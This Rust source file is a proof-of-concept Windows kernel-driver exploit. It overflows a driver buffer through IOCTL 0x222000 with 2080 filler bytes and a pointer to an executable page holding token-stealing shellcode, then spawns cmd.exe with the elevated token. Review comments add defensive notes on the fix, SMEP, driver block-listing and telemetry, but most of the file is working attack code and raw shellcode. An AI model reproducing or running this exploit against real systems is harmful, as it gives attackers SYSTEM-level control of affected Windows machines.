extern crate winapi;
use winapi::um::fileapi::CreateFileA;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::ioapiset::DeviceIoControl;
use std::ptr::null_mut;
use std::process::Command;
//Cargo.toml : winapi = {version = "0.3.7", features=["fileapi", "ioapiset", "memoryapi"]}
/// Entry point: runs the driver trigger in `exploit`, then starts `cmd.exe` and waits for it.
///
/// The shell is spawned as a child of this process after the trigger has returned, so it
/// starts with whatever access token this process holds at that moment. For monitoring,
/// the observable sequence is a device open, one IOCTL, then a `cmd.exe` child whose token
/// may differ from the one the parent was started with.
///
/// # Panics
///
/// Panics with `failed :/` if `cmd.exe` cannot be started.
fn main() {
    // SAFETY: nothing here establishes an invariant for `exploit`; it issues raw Win32
    // calls and checks none of their results.
    unsafe { exploit() };

    let shell_status = Command::new("cmd.exe").status();
    shell_status.expect("failed :/");
}
/// Proof-of-concept trigger that sends an oversized input buffer to a device driver through
/// the raw Win32 API.
///
/// Steps, in order: open a device object, copy machine code into a user-mode
/// read/write/execute page, build a buffer of 2080 filler bytes followed by that page's
/// address, and pass the buffer to the driver with control code 0x222000.
///
/// The driver is not part of this file. NOTE(review): the layout (fixed-length filler, then
/// a pointer) suggests the IOCTL handler copies its input into a smaller fixed-size kernel
/// buffer without a length check; confirm against the driver source.
///
/// Defensive notes:
/// - If that reading is right, the driver-side fix is to bound the copy by the destination
///   size and reject inputs longer than the handler expects.
/// - Kernel code executing a user-mode page is what SMEP (Supervisor Mode Execution
///   Prevention) blocks where it is enabled, so this technique assumes a target without it.
/// - Keeping known-vulnerable drivers from loading (driver block/allow-listing) removes the
///   reachable IOCTL surface altogether.
///
/// # Safety
///
/// No result is checked: the handle, the allocation and the IOCTL status are all used or
/// discarded as returned, and the allocation is written through a raw pointer.
unsafe fn exploit() {
// 32-bit x86 machine code. Disassembled, it follows the widely documented token-copy
// pattern: walk the kernel process list to the process with ID 4, copy that process's
// token reference into the current process, then return with eax = 0. Structure offsets
// are hard-coded, so it fits only specific Windows builds (which one is not stated here).
let shellcode = b"\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x31\xc0\x5d\xc2\x08\x00";
// Win32 device path (raw string, so the backslashes are literal). The name as written
// does not identify a particular driver.
let filename = r"\\.\Device\0";
// 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING. The returned handle is
// not compared with INVALID_HANDLE_VALUE.
let fd = CreateFileA(filename.as_ptr() as _, 0xC0000000, 0, null_mut(), 0x3, 0, null_mut());
// 0x100 bytes, 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE. A private
// allocation that is both writable and executable is a common endpoint-telemetry signal.
let alloc = VirtualAlloc(null_mut(), 0x100, 0x3000, 0x40) as *mut u8;
// Copies the payload into the new page; a null return from VirtualAlloc is not handled
// before this write.
alloc.copy_from(shellcode.as_ptr() as *mut u8, shellcode.len());
// 2080 filler bytes. NOTE(review): the count presumably matches a distance inside the
// driver's buffer layout; not verifiable from this file.
let mut data = vec![b'A'; 2080];
// The page address in little-endian order; its width is that of usize on the build target
// (4 bytes on 32-bit x86, the architecture the payload is written for).
let bytes = (alloc as usize).to_le_bytes();
data.extend_from_slice(&bytes);
// Sends the buffer as IOCTL input with no output buffer. The bytes-returned out-parameter
// points at a temporary and the BOOL result is discarded, so failure is silent.
DeviceIoControl(fd, 0x222000, data.as_ptr() as _, data.len() as _, null_mut(), 0, &mut 0, null_mut());
}